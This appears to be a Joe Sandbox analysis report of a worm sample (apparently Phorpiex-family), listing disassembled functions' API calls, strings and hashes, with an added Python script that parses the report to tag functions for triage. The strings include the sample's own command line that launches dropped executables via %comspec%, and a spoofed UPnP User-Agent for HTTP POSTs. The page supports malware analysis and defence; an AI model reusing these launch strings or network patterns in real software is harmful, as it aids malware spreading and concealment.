• HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
• memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
• InternetCloseHandle.WININET(00000000), ref: 0040F181
• InternetCloseHandle.WININET(00000000), ref: 0040F18E
• InternetCloseHandle.WININET(00000000), ref: 0040F19B
Strings
Yara matches
Similarity
• API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
• String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
• API String ID: 2761394606-2217117414
APIs
• EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
• InterlockedDecrement.KERNEL32(?), ref: 0040164B
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
• InterlockedIncrement.KERNEL32(?), ref: 00401691
• InterlockedDecrement.KERNEL32(?), ref: 004016A1
• LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
• SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
• CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
• CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
• WSACloseEvent.WS2_32(?), ref: 00401715
• DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
Strings
Yara matches
Similarity
• API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
• String ID: PCOI$ilci
• API String ID: 2403999931-3762367603
APIs
• memset.NTDLL ref: 0040E668
• InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
• HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
• memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
• InternetCloseHandle.WININET(00000000), ref: 0040E837
• InternetCloseHandle.WININET(00000000), ref: 0040E844
• InternetCloseHandle.WININET(00000000), ref: 0040E851
Strings
Yara matches
Similarity
• API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
• String ID: <$GET
• API String ID: 1205665004-427699995
APIs
• CoInitialize.OLE32(00000000), ref: 0040666B
• CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
• wsprintfW.USER32 ref: 004066C4
• wsprintfW.USER32 ref: 004066E5
Strings
• cl@, xrefs: 004066A0
• %comspec%, xrefs: 004066EE
• /c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
• /c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
Yara matches
Similarity
• API ID: wsprintf$CreateInitializeInstance
• String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
• API String ID: 1147330536-497122036
APIs
• InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
• InterlockedDecrement.KERNEL32(?), ref: 00401DB0
• InterlockedDecrement.KERNEL32(?), ref: 00401DC3
• InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
• InterlockedDecrement.KERNEL32(?), ref: 00401E5B
• InterlockedDecrement.KERNEL32(?), ref: 00401EF6
• setsockopt.WS2_32 ref: 00401F2C
• closesocket.WS2_32(?), ref: 00401F39
  • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
  • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
Yara matches
Similarity
• API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
• String ID:
• API String ID: 671207744-0
APIs
• lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
• SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
• SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: FreeStringlstrcmpi
• String ID: device$deviceType
• API String ID: 1602765415-3511266565
• Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
• Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
• Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
• Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
APIs
• lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
• SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
• SysFreeString.OLEAUT32(00000000), ref: 0040EC97
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: FreeStringlstrcmpi
• String ID: service$serviceType
• API String ID: 1602765415-3667235276
• Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
• Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
• Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
• Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
• LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
• Opcode ID: 94c249e045a06f1e2524c37c45e205f07dc7f45f180538b1808bcfe672da9775
• Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
• Opcode Fuzzy Hash: 94c249e045a06f1e2524c37c45e205f07dc7f45f180538b1808bcfe672da9775
• Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
APIs
• lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
• SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
• SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: FreeStringlstrcmpi
• String ID: device$deviceType
• API String ID: 1602765415-3511266565
• Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
• Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
• Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
• Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
APIs
• lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
• SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
• SysFreeString.OLEAUT32(00000000), ref: 0040EC97
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: FreeStringlstrcmpi
• String ID: service$serviceType
• API String ID: 1602765415-3667235276
• Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
• Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
• Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
• Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
APIs
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: _allshl_aullshr
• String ID:
• API String ID: 673498613-0
• Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
• Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
• Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
• Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
APIs
• GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
• QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
• StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
Strings
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: DeviceDriveQueryType
• String ID: ?c@$\??\
• API String ID: 1681518211-744975932
• Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
• Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
• Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
• Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
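The per-function "APIs" lists above are the most useful part of this section for a triage workflow: the API set of a function, together with the string constants passed to it, often says what the function is for before anyone opens the disassembly. The function at 0040636D is a case in point: GetDriveTypeW plus QueryDosDeviceW enumerates drive letters and resolves each to its NT device name, and the StrCmpNW against the 4-character prefix \??\ tells a drive letter created with SUBST (which QueryDosDeviceW reports as \??\<path>) apart from a real volume (\Device\...). The following script is an added example and not part of the Joe Sandbox report; it parses the report's own "APIs" entries (the three blocks embedded below are copied from the function blocks on this page) into per-function records, then tags each function with hand-written API-combination rules. The rule names, the "subst-drive-check" tag and the reading of the \??\ compare are this example's own interpretation, not something the report states.

```python
import re
from collections import Counter

# Sample input: the "APIs" entries of three function blocks, copied from the
# Joe Sandbox report above in the report's own layout.  Headings other than
# "APIs", "Strings" and "Memory Dump Source" are irrelevant to the parser.
SAMPLE_REPORT = r"""
APIs
• GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
• QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
• StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
Strings
Memory Dump Source
APIs
• lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
• SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
• SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
Strings
Memory Dump Source
APIs
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
• InterlockedDecrement.KERNEL32(?), ref: 004018B1
  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
Memory Dump Source
"""

# One call line: "<api>.<module>(<args>), ref: <addr>", optionally prefixed
# with "Part of subcall function <addr>: " for calls inherited from a callee.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Headings that terminate an "APIs" list in the report layout.
END_OF_APIS = {"Strings", "Memory Dump Source"}

# Hand-written rules (names are this example's own): an API set that, seen
# together in one function, deserves a closer look in a worm sample.
RULES = {
    "drive-enumeration": {"GetDriveTypeW", "QueryDosDeviceW"},
    "bstr-compare": {"lstrcmpiW", "SysFreeString"},
    "refcount-under-lock": {"InterlockedExchangeAdd", "EnterCriticalSection", "LeaveCriticalSection"},
}

# QueryDosDeviceW resolves a SUBST'd drive letter to "\??\<path>"; a real
# volume resolves to "\Device\...".  A 4-char compare against this prefix is
# therefore a SUBST check (interpretation, not stated by the report).
SUBST_PREFIX = "\\??\\"


def parse_api_blocks(report_text):
    """Split the report into per-function "APIs" blocks and parse each call.

    Each block is a list of dicts: api, module, args (list of str), ref (the
    call-site address as int) and subcall (callee address the call was
    inherited from, or None when the function makes the call itself).
    """
    blocks, current = [], None
    for line in report_text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
            continue
        if stripped in END_OF_APIS:
            current = None
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if not m:
            continue  # not a call line
        current.append({
            "api": m["api"],
            "module": m["module"],
            "args": m["args"].split(",") if m["args"] else [],
            "ref": int(m["ref"], 16),
            "subcall": int(m["sub"], 16) if m["sub"] else None,
        })
    return blocks


def classify(block):
    """Return the rule names whose API set is fully present in one block.

    Inherited subcall entries count as well: the report lists them because
    the function reaches them.  Also tags a StrCmpNW against the \\??\\ prefix.
    """
    apis = {c["api"] for c in block}
    tags = {name for name, needed in RULES.items() if needed <= apis}
    if any(SUBST_PREFIX in c["args"] for c in block if c["api"] == "StrCmpNW"):
        tags.add("subst-drive-check")
    return tags


def summarize(report_text):
    """One record per non-empty function block: first own call site, API histogram, tags."""
    out = []
    for block in parse_api_blocks(report_text):
        if not block:
            continue
        own = [c for c in block if c["subcall"] is None]
        out.append({
            "first_ref": min(c["ref"] for c in own) if own else None,
            "api_counts": Counter(c["api"] for c in block),
            "tags": classify(block),
        })
    return out


if __name__ == "__main__":
    for rec in summarize(SAMPLE_REPORT):
        print(f"{rec['first_ref']:08X}  {sorted(rec['tags'])}  {dict(rec['api_counts'])}")
```

The rule table is where an analyst's judgment goes: for a Phorpiex-family sample the drive-enumeration rule is the one to chase first, because a function that walks drive letters and filters out SUBST mappings is the natural front end to removable-media spreading, but that link is a working hypothesis to confirm in the disassembly at 0040636D, not a fact the API list proves.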
APIs
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
• InterlockedDecrement.KERNEL32(?), ref: 004018B1
  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
Memory Dump Source
• Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
• String ID:
• API String ID: 3966618661-0
• Opcode ID: fa77988927cb930059e1e0cbc8a5de5e4af0f9e1d52da1810f0081e508491bbd
• Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
• Opcode Fuzzy Hash: fa77988927cb930059e1e0cbc8a5de5e4af0f9e1d52da1810f0081e508491bbd
• Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _allshl
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                    • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                    • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                    • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                    APIs
                                                                                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                      • Part of subcall function 0040AB60: RtlFreeHeap.NTDLL(02DE0000,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                    • String ID: pdu
                                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                                    • Opcode ID: d53d7859b80e41eb9fd1776689c76fead4092fa41b0b9c03735f9e49e291d2c8
                                                                                                                                    • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                    • Opcode Fuzzy Hash: d53d7859b80e41eb9fd1776689c76fead4092fa41b0b9c03735f9e49e291d2c8
                                                                                                                                    • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                    APIs
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                    APIs
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                    APIs
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(02DE0634), ref: 0040DEA9
                                                                                                                                    • CloseHandle.KERNEL32(02DE0638), ref: 0040DED8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(02DE0634), ref: 0040DEE7
                                                                                                                                    • DeleteCriticalSection.KERNEL32(02DE0634), ref: 0040DEF4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2003370192.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.2003359211.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.2003395330.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3102160386-0
